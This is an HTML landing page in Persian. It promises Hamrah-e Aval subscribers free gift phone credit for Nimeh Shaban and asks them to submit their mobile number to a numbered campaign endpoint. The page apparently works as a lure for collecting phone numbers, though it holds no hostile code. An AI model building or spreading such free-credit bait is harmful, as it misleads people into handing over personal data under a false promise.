<!doctype html>
<html lang="en" style="background-size:cover; margin:0; height:100vh">
    <head>
        <title>Kaaleskeh</title>
        <link rel="stylesheet" href="/css/landingStyle.css" type="text/css">
        <link rel="stylesheet" href="/bower_components/bootstrap/dist/css/bootstrap.css">
        <link rel="stylesheet" href="/bower_components/components-font-awesome/css/font-awesome.min.css">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta charset="UTF-8">
		<link rel="shortcut icon" sizes="114x114" type="image/x-icon" href="/images/favicon.ico" />
        <link rel="icon" sizes="192x192" href="/images/favicon.ico" />
    </head>
    <body style="background-color:#FEC786">
        <div id="landingContainer" >
            <div>
                <img src="/images/Landing2.jpg" class="coverImage" />
            </div>
            <form
                autocomplete="off"
                action="/landing/sendPhoneNumber/622" 
                method="post" 
                name="phoneNumberForm"
                onsubmit="return validatePhoneNumberForm ()"
            >
                <div class="landingInputDiv">
                    <p class="landingStartText">
                            جهت دریافت شارژ شماره همراه اول خود را وارد نمایید
                        </br>
                            👇🏼👇🏼👇🏼👇🏼👇🏼
                    </p>
                    <input 
                        oninput=" validatePhoneNumberMaxlength(this.value)"
                        id="inputNums"
                        class="landingInput"
                        maxlength="11" 
                        type="text" 
                        name="phoneNumber"  
                        placeholder="۰۹۱"
                        required
                        oninvalid="this.setCustomValidity('لطفا شماره خود را وارد نمایید')"
                        oninput="setCustomValidity('')"
                    >
                </div>
                <div class="landingButton">
                    <button class="btn" type="submit">
                        تائید
                    </button>  
                </div>
                <p class="landingText">
                    *ویژه مشترکین همراه اول*
                </br>
                    به مناسبت نیمه شعبان، شارژ هدیه دریافت کنید.
                </p>  
            </form>		
        </div>    
    </body>
    <script src="/js/script.js"></script>
</html>   